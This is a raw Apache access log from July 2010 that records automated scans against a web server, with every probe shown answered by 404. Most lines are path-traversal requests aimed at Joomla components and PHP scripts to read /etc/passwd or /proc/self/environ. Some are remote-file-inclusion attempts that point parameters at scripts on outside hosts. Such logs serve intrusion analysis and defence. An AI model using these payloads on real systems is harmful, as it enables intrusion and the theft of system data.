121.78.118.123 - - [27/Jul/2010:07:54:22 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:07:59:15 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:59:16 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:59:16 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
62.44.82.118 - - [27/Jul/2010:08:02:26 +0200] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:04:52 +0200] "GET /logs/access_log//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:04:53 +0200] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:04:53 +0200] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:15:59 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
62.44.82.118 - - [27/Jul/2010:08:15:59 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
201.12.141.11 - - [27/Jul/2010:08:19:28 +0200] "GET /logs/access_log%20/index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "-"
201.12.141.11 - - [27/Jul/2010:08:19:28 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [27/Jul/2010:08:19:28 +0200] "GET /logs/access_log%20/index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 312 "-" "-"
201.12.141.11 - - [27/Jul/2010:08:19:28 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [27/Jul/2010:08:19:39 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "-"
201.12.141.11 - - [27/Jul/2010:08:19:40 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-" "-"
80.249.165.44 - - [27/Jul/2010:08:41:35 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 295 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:41:35 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:41:35 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 311 "-" "plaNETWORK Bot Search"
65.52.104.36 - - [27/Jul/2010:08:41:45 +0200] "GET /?C=S;O=A HTTP/1.1" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729)"
207.46.13.138 - - [27/Jul/2010:08:57:38 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.197.25 - - [27/Jul/2010:08:58:03 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:08:58:03 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
207.46.13.138 - - [27/Jul/2010:08:58:31 +0200] "GET /logs/ HTTP/1.1" 200 796 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.178 - - [27/Jul/2010:09:14:17 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.118.67.13 - - [27/Jul/2010:09:26:17 +0200] "GET /logs/access_log/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:26:17 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:26:18 +0200] "GET /logs/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:27:21 +0200] "GET /logs/access_log/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:27:22 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:27:22 +0200] "GET /logs/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:27 +0200] "GET /logs/access_log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:27 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:27 +0200] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:56 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
95.211.71.21 - - [27/Jul/2010:09:47:39 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:36 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:36 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:36 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:36 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
216.18.201.205 - - [27/Jul/2010:09:57:01 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:09:57:01 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:09:58:02 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
95.211.71.21 - - [27/Jul/2010:09:58:45 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:09:58:45 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
95.211.71.21 - - [27/Jul/2010:09:58:45 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
216.18.201.205 - - [27/Jul/2010:09:58:52 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:09:58:53 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
213.145.228.170 - - [27/Jul/2010:09:59:16 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:09:59:20 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:09:59:21 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
216.18.201.205 - - [27/Jul/2010:09:59:54 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.833"
213.145.228.170 - - [27/Jul/2010:10:00:43 +0200] "GET /logs/access_log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:00:44 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:00:44 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:02:36 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:37 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:37 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:37 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.813"
216.18.201.205 - - [27/Jul/2010:10:05:57 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:05:58 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:05:58 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.833"
202.47.80.12 - - [27/Jul/2010:10:09:05 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:09:05 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
216.18.201.205 - - [27/Jul/2010:10:09:24 +0200] "GET /logs/access_log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:09:24 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:09:24 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
202.47.80.12 - - [27/Jul/2010:10:14:33 +0200] "GET /logs/access_log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:14:38 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:14:41 +0200] "GET /logs/access_log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:14:44 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:14:47 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:14:52 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:16:01 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:16:01 +0200] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:16:06 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:16:06 +0200] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:21 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:21 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:22 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:22 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:23 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:22:24 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
67.227.197.25 - - [27/Jul/2010:10:22:28 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:22:28 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:22:28 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:22:28 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
83.149.110.213 - - [27/Jul/2010:10:23:22 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:10:23:22 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:24:04 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:24:04 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:10:24:21 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:24:21 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:10:29:04 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:29:04 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:30:11 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:30:16 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
67.227.197.25 - - [27/Jul/2010:10:48:38 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:48:38 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:48:51 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:48:51 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:49:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:49:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.833"
92.43.201.28 - - [27/Jul/2010:10:51:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:51:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:10:54:53 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:54:53 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:56:34 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:56:34 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
94.23.215.207 - - [27/Jul/2010:10:57:15 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:15 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:15 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:15 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:19 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:19 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:19 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:19 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:22 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:22 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:24 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:10:57:24 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
87.118.67.13 - - [27/Jul/2010:10:59:07 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:10:59:07 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
76.242.100.234 - - [27/Jul/2010:10:59:41 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:59:49 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:59:49 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
188.72.70.56 - - [27/Jul/2010:11:02:49 +0200] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:02:49 +0200] "GET /logs/access_log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:02:49 +0200] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 334 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:03:17 +0200] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 334 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:03:17 +0200] "GET /logs/access_log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 347 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:03:17 +0200] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 329 "-" "Mozilla/5.0"
202.47.80.12 - - [27/Jul/2010:11:07:12 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:18 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:23 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:35 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:41 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:07:46 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
